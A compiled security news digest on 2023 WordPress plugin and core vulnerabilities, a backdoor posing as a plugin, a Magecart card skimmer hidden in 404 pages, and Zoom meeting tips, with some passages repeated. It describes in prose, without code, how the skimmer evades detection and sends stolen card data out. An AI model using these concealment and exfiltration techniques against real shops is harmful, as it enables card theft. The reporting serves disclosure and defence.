Several Critical Vulnerabilities Patched in AI ChatBot Plugin for WordPress

On September 28, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for multiple vulnerabilities in AI ChatBot, a WordPress plugin with over 4,000 active installations.

After making their initial contact attempt on September 28th, 2023, they received a response on September 29, 2023 and sent over their full disclosure details. Receipt of the disclosure by the vendor was acknowledged the same day and a fully patched version of the plugin was released on October 19, 2023.

Wordfence issued a firewall rule to protect paid customers. Users of the free Wordfence plugin will receive the same protection on October 29, 2023.

Please note that these vulnerabilities were originally fixed in 4.9.1 (released October 10, 2023). However, some of them were reintroduced in 4.9.2 and then subsequently patched again in 4.9.3. We recommend that all Wordfence users update to version 4.9.3 or higher immediately.

Source and full details:

4 Million WordPress Sites affected by Stored Cross-Site Scripting Vulnerability in LiteSpeed Cache Plugin

On August 14, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for a stored Cross-Site Scripting (XSS) vulnerability in LiteSpeed Cache plugin, which is actively installed on more than 4,000,000 WordPress websites, making it the most popular cache plugin. The vulnerability enables threat actors with contributor-level permissions or higher to inject malicious web scripts into pages using the plugin’s shortcode.

All WordFence customers are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting protection.

WordFence contacted The LiteSpeed Cache Team on August 14, 2023, and we received a response on the same day. After providing full disclosure details, the developer team made a patch on August 16, 2023, and released it to the WordPress repository on October 10, 2023. We would like to commend the LiteSpeed Technologies for their prompt response and timely patch.

We urge users to update their sites with the latest patched version of LiteSpeed Cache, version 5.7 at the time of this writing, as soon as possible.

Source and more details:

4 Million WordPress Sites affected by Stored Cross-Site Scripting Vulnerability in LiteSpeed Cache Plugin

The popular LiteSpeed WordPress plugin patched a vulnerability that compromised over 4 million websites, allowing hackers to upload malicious scripts.

LiteSpeed was notified of the vulnerability two months ago on August 14th and released a patch in October.

Cross-Site Scripting (XSS) Vulnerability

Wordfence discovered a Cross-Site Scripting (XSS) vulnerability in the LiteSpeed plugin, the most popular WordPress caching plugin in the world.

XSS vulnerabilities are generally a type that takes advantage of a lack of a security process called data sanitization and escaping.

Sanitization is a technique that filters what kind of files can be uploaded via a legitimate input, like on a contact form.

In the specific LiteSpeed vulnerability, the implementation of a shortcode functionality allowed a malicious hacker to upload scripts they otherwise would not be able to had the proper security protocols of sanitization/escaping data been in place.

The WordPress developer page describes the sanitization security practice:

“Untrusted data comes from many sources (users, third party sites, even your own database!) and all of it needs to be checked before it’s used.

…Sanitizing input is the process of securing/cleaning/filtering input data.”

Another WordPress developer page describes the recommended process of escaping data like this:

“Escaping output is the process of securing output data by stripping out unwanted data, like malformed HTML or script tags.

This process helps secure your data prior to rendering it for the end user.”

This specific vulnerability requires that the hacker first obtain contributor level permissions in order to carry out the attack, which makes carrying out the attack more complicated than other kinds of threats that are unauthenticated (require no permission level).

According to Wordfence:

“This makes it possible for threat actors to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page.

While this vulnerability does require that a trusted contributor account is compromised, or a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.”

Which Versions of LiteSpeed Plugin Are Vulnerable?

Versions 5.6 or less of the LiteSpeed Cache plugin are vulnerable to the XSS attack.

Users of the LiteSpeed Cache are encouraged to update their plugin as soon as possible to the latest version, 5.7 which was released on October 10, 2023.

Source and more details:

See also:

WordPress 6.3.2 – Maintenance and Security release

This security and maintenance release features 19 bug fixes on Core, 22 bug fixes for the Block Editor, and 8 security fixes.

WordPress 6.3.2 is a short-cycle release. You can review a summary of the maintenance updates in this release by reading the Release Candidate announcement. Because this is a security release, it is recommended that you update your sites immediately. Backports are also available for other major WordPress releases, 4.1 and later.

The next major release will be version 6.4 planned for 7 November 2023.

If you have sites that support automatic background updates, the update process will begin automatically.

You can download WordPress 6.3.2 from, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”.

For more information on this release, please visit the HelpHub site.

Security updates included in this release

The security team would like to thank the following people for responsibly reporting vulnerabilities, and allowing them to be fixed in this release:

  • Marc Montpas of Automattic for finding a potential disclosure of user email addresses.
  • Marc Montpas of Automattic for finding an RCE POP Chains vulnerability.
  • Rafie Muhammad and Edouard L of Patchstack along with a WordPress commissioned third-party audit for each independently identifying a XSS issue in the post link navigation block.
  • Jb Audras of the WordPress Security Team and Rafie Muhammad of Patchstack for each independently discovering an issue where comments on private posts could be leaked to other users.
  • John Blackbourn (WordPress Security Team), James GolovichJ.D GrimesNuman TurleWhiteCyberSec for each independently identifying a way for logged-in users to execute any shortcode.
  • mascara7784 and a third-party security audit for identifying a XSS vulnerability in the application password screen.
  • Jorge Costa of the WordPress Core Team for identifying XSS vulnerability in the footnotes block.
  • s5s and raouf_maklouf for independently identifying a cache poisoning DoS vulnerability.

Source and more details: and

Unauthenticated File Upload Vulnerability Addressed in Royal Elementor Addons and Templates 1.3.79

During an investigation of a series of website being actively compromised we noticed the constant presence of the Royal Elementor Addons and Templates plugin installed. And all sites had at least one malicious file dropped into the /wpr-addons/forms/ directory.

As we reviewed the plugin it was found that the upload ajax action wasn’t properly validating the uploaded file’s extensions, allowing bad actors to bypass the check and drop malicious files to the /wpr-addons/forms/ directory.

Upon identifying the vulnerability, we promptly alerted the plugin development team, who released version 1.3.79 to fix the issue. It is crucial for administrators to ensure their WordPress installations are fully updated to safeguard against this vulnerability.

Source and full details:


Finding A RCE Gadget Chain In WordPress Core

During a recent team gathering in Belgium, WPScan had an impromptu Capture The Flag game that included a challenge with an SQL Injection vulnerability occurring inside an INSERT statement, meaning attackers could inject random stuff into the targeted table’s columns, and query information from the database, the intended “flag” being the credentials of a user on the affected blog.

The vulnerable SQL query inserted new rows into the wp_termmeta table, which while WPScan knew it could potentially lead to Object Injection attacks due to the inserted metadata being passed through maybe_unserialize upon retrieval, WPScan didn’t think too much about it since the common thought on the matter was that there was no known current RCE gadget chain in WordPress Core, and thus the challenge was “safe” since it didn’t use any other external plugins.

This proved to be enough to win that flag, however, the thought that there might be an alternative solution to the challenge piqued our curiosity. What if there was a working RCE gadget chain in Core waiting to be found?

Turns out, there was a way, which the WordPress Security Team fixed on version 6.3.2 by preventing several classes used in the final chain from either being unserialized at all, or restricting what some of their unserialized properties may contain.

Source and more details:

Email Leak Oracle Vulnerability Addressed in WordPress 6.3.2

During a thorough analysis of WordPress’ internals, WPScan discovered a subtle bug that allowed unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website.

If successfully exploited, attackers could gather email addresses, putting user privacy at risk.

Upon identifying the vulnerability, WPScan promptly alerted the WordPress team, who released version 6.3.2 to fix the issue. It is crucial for administrators to ensure their WordPress installations are fully updated to safeguard against this vulnerability.

WordPress’ official advisory can be found here.

Source and more details:

Backdoor Masquerading as Legitimate Plugin

Today, we would like to share a type of malware that serves as a sophisticated backdoor capable of performing a variety of tasks while masquerading as a real plugin. Complete with a professional looking opening comment implying it is a caching plugin, this rogue code contains numerous functions, adds filters to prevent itself from being included in the list of activated plugins, and has pinging functionality that allows a malicious actor to check if the script is still operational, as well as file modification capabilities. Additionally, it offers the ability to create an admin account, and remotely activate and deactivate plugins.

The sample was discovered during a site clean by one of the analysts at WordFence on July 18, 2023. A signature was developed by the same analyst the following day and released to production within two weeks after undergoing testing. Customers using the free version of Wordfence received this signature after a 30 day delay on September 1, 2023.

Users of WordFence Premium are protected against the use of this backdoor via a firewall rule as of October 9, 2023. Users of the free version of WordFence will receive the firewall rule on November 9, 2023.

Source and more details:

Hackers modify online stores’ 404 pages to steal credit cards

A new Magecart card skimming campaign hijacks the 404 error pages of online retailer’s websites, hiding malicious code to steal customers’ credit card information.

This technique is one of the three variants observed by researchers of the Akamai Security Intelligence Group, with the other two concealing the code in the HTML image tag’s ‘onerror’ attribute and an image binary to make it appear as the Meta Pixel code snippet.

Akamai says the campaign focuses on Magento and WooCommerce sites, with some victims linked to renowned organizations in the food and retail sectors.

Manipulating 404 pages
All websites feature 404 error pages that are displayed to visitors when accessing a webpage that does not exist, has been moved, or has a dead/broken link.

The Magecart actors leverage the default ‘404 Not Found’ page to hide and load the malicious card-stealing code, which hasn’t been seen before in previous campaigns.

“This concealment technique is highly innovative and something we haven’t seen in previous Magecart campaigns,” reads Akamai’s report.

“The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion.”

The skimmer loader either disguises itself as a Meta Pixel code snippet or hides within random inline scripts already present on the compromised checkout web page.

The loader initiates a fetch request to a relative path named ‘icons,’ but as this path does not exist on the website, the request results in a “404 Not Found” error.

Akamai’s investigators initially assumed the skimmer was no longer active or the Magecart group had made a configuration mistake. However, upon closer inspection, they found that the loader contained a regular expression match searching for a specific string in the returned HTML of the 404 page.

Upon locating the string on the page, Akamai found a concatenated base64-encoded string concealed in a comment. Decoding that string revealed the JavaScript skimmer, which hides in all 404 pages.

“We simulated additional requests to nonexistent paths, and all of them returned the same 404 error page containing the comment with the encoded malicious code,” explains Akamai

“These checks confirm that the attacker successfully altered the default error page for the entire website and concealed the malicious code within it!”

Because the request is made to a first-party path, most security tools monitoring suspicious network requests on the checkout page would overlook it.

Stealing the data
The skimmer code displays a fake form that the website visitors are expected to fill out with sensitive details, including their credit card number, expiration date, and security code.

Once this data is entered on the bogus form, the victim gets a fake “session timeout” error.

In the background, all information is base64-encoded and sent to the attacker via an image request URL carrying the string as a query parameter.

This approach helps evade detection by network traffic monitoring tools, as the request looks like a benign image fetch event. However, decoding the base64 string reveals personal and credit card information.

The case of manipulating 404 pages highlights the evolving tactics and versatility of Magecart actors, who continually make it harder for webmaster to locate their malicious code on compromised websites and sanitize them.

Source and more details:

How to Keep Uninvited Guests Out of Your Zoom Meeting

 Without precautions, meetings that are designed to bring people together could be attended by a person who is not invited. 

Disruptions typically occur when meeting information is made open to the public. A user could post a private meeting link on social media, share their virtual classroom information, and more. But when these links are out on social media or other public forums, that makes your meeting completely public and anyone with the link can join it. 

Here are a few easy ways you can help prevent disruptions:

Tips to prevent disruptions 

  • Use the right Zoom solution for your need: If you’re specifically hoping to use Zoom to host a virtual event with people you may not know, make sure to steer your attention from Zoom Meetings to Zoom Webinars or Zoom Events — products designed specifically for digital events. 
  • Avoid using your Personal Meeting ID (PMI): Your PMI is basically one continuous meeting and you don’t want outsiders crashing your personal virtual space after your designated meeting is over. 
  • Manage screen sharing: You do not want random people in your public session taking control of the screen and sharing unwanted content with the group. You can restrict this — before the meeting and during the meeting in the host control bar — so that you’re the only one who can screen share. If you disable screen sharing, the Whiteboard setting will be automatically disabled as well. 

To prevent participants from screen sharing during a call, using the host controls at the bottom, click the arrow next to “Share Screen” and then go to “Advanced Sharing Options.” Under “Who can share?” choose “Only Host” and close the window.  

 without precautions, meetings that are designed to bring people together could be attended by a person who is not invited. 

Disruptions typically occur when meeting information is made open to the public. A user could post a private meeting link on social media, share their virtual classroom information, and more. But when these links are out on social media or other public forums, that makes your meeting completely public and anyone with the link can join it. 

Enable the Waiting Room

The Waiting Room is an important feature for securing a Zoom Meeting. Just like it sounds, the Waiting Room is a virtual staging area that stops your guests from joining until you’re ready for them. It’s almost like the velvet rope outside a nightclub, with you as the bouncer carefully monitoring who gets let in.

Meeting hosts can customize Waiting Room settings for additional control, and you can even personalize the message people see when they hit the Waiting Room so they know they’re in the right spot. This message is really a great spot to post any rules/guidelines for your event, like who it’s intended for.

Updated customized waiting room message

The Waiting Room is an effective way to screen who’s trying to enter your Zoom session and keep unwanted guests out. When you disable “Join before host” in your settings, a Waiting Room will automatically greet your guests until you’ve started the meeting.

Keep Zooming responsibly

We hope these security features will help you continue to host safe and successful Zoom Meetings. Security is a key value for us at Zoom and will continue to help guide new product updates. We’re committed to being a platform users can trust — with their online interactions, information, and business. 

To learn more about Zoom privacy and security, explore our Trust Center.